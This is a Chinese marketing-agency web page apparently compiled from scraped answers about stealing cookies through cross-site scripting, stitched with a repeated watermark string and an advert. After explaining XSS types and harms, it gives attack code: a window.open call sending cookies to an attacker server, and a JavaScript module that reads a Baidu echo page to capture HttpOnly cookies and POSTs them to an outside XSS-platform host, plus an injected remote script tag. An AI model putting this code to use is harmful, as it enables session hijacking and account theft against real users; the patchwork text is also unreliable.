HOME 首页
SERVICE 服务产品
XINMEITI 新媒体代运营
CASE 服务案例
NEWS 热点资讯
ABOUT 关于我们
CONTACT 联系我们
创意岭
让品牌有温度、有情感
专注品牌策划15年

    xss攻击获取cookie(xss 获取cookie)

    发布时间:2023-06-13 23:14:44     稿源: 创意岭    阅读: 103        

    大家好!今天让创意岭的小编来大家介绍下关于xss攻击获取cookie的问题,以下是小编对此问题的归纳整理,让我们一起来看看吧。A61创意岭 - 安心托付、值得信赖的品牌设计、营销策划公司

    开始之前先推荐一个非常厉害的Ai人工智能工具,一键生成原创文章、方案、文案、工作计划、工作报告、论文、代码、作文、做题和对话答疑等等A61创意岭 - 安心托付、值得信赖的品牌设计、营销策划公司

    只需要输入关键词,就能返回你想要的内容,有小程序、在线网页版、PC客户端和批量生成器A61创意岭 - 安心托付、值得信赖的品牌设计、营销策划公司

    问友Ai官网:https://ai.de1919.comA61创意岭 - 安心托付、值得信赖的品牌设计、营销策划公司

    本文目录:A61创意岭 - 安心托付、值得信赖的品牌设计、营销策划公司

    xss攻击获取cookie(xss 获取cookie)A61创意岭 - 安心托付、值得信赖的品牌设计、营销策划公司

    xss攻击的危害有哪些?A61创意岭 - 安心托付、值得信赖的品牌设计、营销策划公司

    跨站脚本 ( Cross-Site Scriptin ) 简称xss,是由于Web应用程序对用户的输入过滤不足而产生的.攻击者利用网站漏洞把恶意的脚本代码(通常包括HTML代码和客户端 Javascript脚本)注入到网页之中,当其他用户浏览这些网页时,就会执行其中的恶意代码,对受害用户可能采取 Cookie资料窃取、会话劫持、钓鱼欺骗等各种攻击。
    其危害有:
    1、网络钓鱼,包括盗取各类用户账号;
    2、窃取用户cookies资料,从而获取用户隐私信息,或利用用户身份进一步对网站执行操作;
    3、劫持用户(浏览器)会话,从而执行任意操作,例如进行非法转账、强制发表日志、发送电子邮件等;
    4、强制弹出广告页面、刷流量等;
    5、网页挂马,进行恶意操作,例如任意篡改页面信息、删除文章等;
    6、进行大量的客户端攻击,如DDoS攻击;
    7、获取客户端信息,例如用户的浏览历史、真实IP、开放端口等;
    8、控制受害者机器向其他网站发起攻击;
    9、结合其他漏洞,如CSRF漏洞,进一步入侵和破坏系统;
    10、提升用户权限,包括进一步渗透网站;
    11、传播跨站脚本蠕虫等;

    什么是 XSS攻击?A61创意岭 - 安心托付、值得信赖的品牌设计、营销策划公司

    XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java、VBscript、ActiveX、
    Flash或者甚至是普通的HTML。攻击成功后,攻击者可能得到包括但不限于更高的权限、私密网页内容、会话和cookie等各种内容。
    其攻击原理如下:
    XSS主要分为:反射型XSS、存储型XSS、DOM型XSS三种攻击类型,而每种类型的攻击原理都不一样。其中反射型XSS和DOM-based型XSS可以归类为非持久型XSS攻击,存储型XSS归类为持久型XSS攻击。
    反射型XSS:攻击者可通过特定的方式来诱惑受害者去访问一个包含恶意代码的URL。当受害者点击恶意链接url的时候,恶意代码会直接在受害者的主机上的浏览器执行。
    存储型XSS:主要是将恶意代码上传或存储到服务器中,下次只要受害者浏览包含此恶意代码的页面就会执行恶意代码。
    DOM-based型XSS:客户端的脚本程序可以动态地检查和修改页面内容,而不依赖于服务器端的数据。例如客户端如从URL中提取数据并在本地执行,如果用户在客户端输入的数据包含了恶意的JavaScript脚本,而这些脚本没有经过适当的过滤和消毒,那么应用程序就可能受到DOM-based
    XSS攻击。需要特别注意以下的用户输入源document.URL、location.hash、location.search、document.referrer等。

    xss 怎么获取用户cookieA61创意岭 - 安心托付、值得信赖的品牌设计、营销策划公司

    XSS获取cookie并利用 获取cookie利用代码cookie.asp xx 把上述文件保存为cookie.asp文件,放到你自己的网站服务器下。比如这里我们自己搭建的服务器为:http://10.65.20.196:8080。 XSS构造语句 window.open('http://10.65.20.196:8080/cookie.

    xss攻击获取cookie(xss 获取cookie)A61创意岭 - 安心托付、值得信赖的品牌设计、营销策划公司

    如何通过 XSS 获取受 http-only さcookieA61创意岭 - 安心托付、值得信赖的品牌设计、营销策划公司

    该测试页返回了完整的http头,其中也包括了完整的cookie。混贴吧圈的应该都知道BDUSS是最关键的字段,同时该字段是受http-only保护的,百度SRC之前也因此下调了XSS的评分标准。
    02.jpg
    这样,我们只要利用XSS平台的"指定页面源码读取"模块即可通过XSS获取用户的完整cookie。该模块代码如下:
    code 区域
    var u = 'http://buv.me/index.php?do=api&id={projectId}';
    var cr;
    if (document.charset) {
    cr = document.charset
    } else if (document.characterSet) {
    cr = document.characterSet
    };
    function createXmlHttp() {
    if (window.XMLHttpRequest) {
    xmlHttp = new XMLHttpRequest()
    } else {
    var MSXML = new Array('MSXML2.XMLHTTP.5.0', 'MSXML2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP', 'Microsoft.XMLHTTP');
    for (var n = 0; n < MSXML.length; n++) {
    try {
    xmlHttp = new ActiveXObject(MSXML[n]);
    break
    } catch(e) {}
    }
    }
    }
    createXmlHttp();
    xmlHttp.onreadystatechange = writeSource;
    xmlHttp.open("GET", "http://appstest.baidu.com/http/echoheader.php", true);
    xmlHttp.send(null);
    function postSource(cc) {
    createXmlHttp();
    url = u;
    cc = "mycode=" + cc;
    xmlHttp.open("POST", url, true);
    xmlHttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    xmlHttp.setRequestHeader("Content-length", cc.length);
    xmlHttp.setRequestHeader("Connection", "close");
    xmlHttp.send(cc)
    }
    function writeSource() {
    if (xmlHttp.readyState == 4) {
    var c = new postSource(xmlHttp.responseText)
    }
    }
    由于是用xmlHttpRequest的形式读源码,且 http://appstest.baidu.com/ 的 Access-Control-Allow-Origin 为空,即默认不允许跨域,所以我们必须在同域下才能用xmlHttpRequest获取到完整的cookie。
    我在 http://wooyun.org/bugs/wooyun-2014-051026/trace/e80c9b4ecb9c252d6bdfdb21c335164d 中有提到, http://appstest.baidu.com/abnormalTest/abnormaTest.php?typeName=single 可以自由构造XSS。我们向该页面写入如下代码:
    code 区域
    <title>wooyun.org</title>
    <p>超威蓝猫@wooyun.org</p>
    <script src=http://00f.me/XbSWCk></script>

    以上就是关于xss攻击获取cookie相关问题的回答。希望能帮到你,如有更多相关问题,您也可以联系我们的客服进行咨询,客服也会为您讲解更多精彩的知识和内容。A61创意岭 - 安心托付、值得信赖的品牌设计、营销策划公司


    推荐阅读:

    云vi设计(pixso云设计)

    苹果xsmax老是自动跳屏(苹果xsmax自动跳屏屏幕失灵咋回事)

    网络语xs是什么意思(网络用语xs是什么意思)

    信号强的手机排行榜(接打电话信号强的手机排行榜)

    鲤城新媒体代运营公司(鲤城新媒体代运营公司有哪些)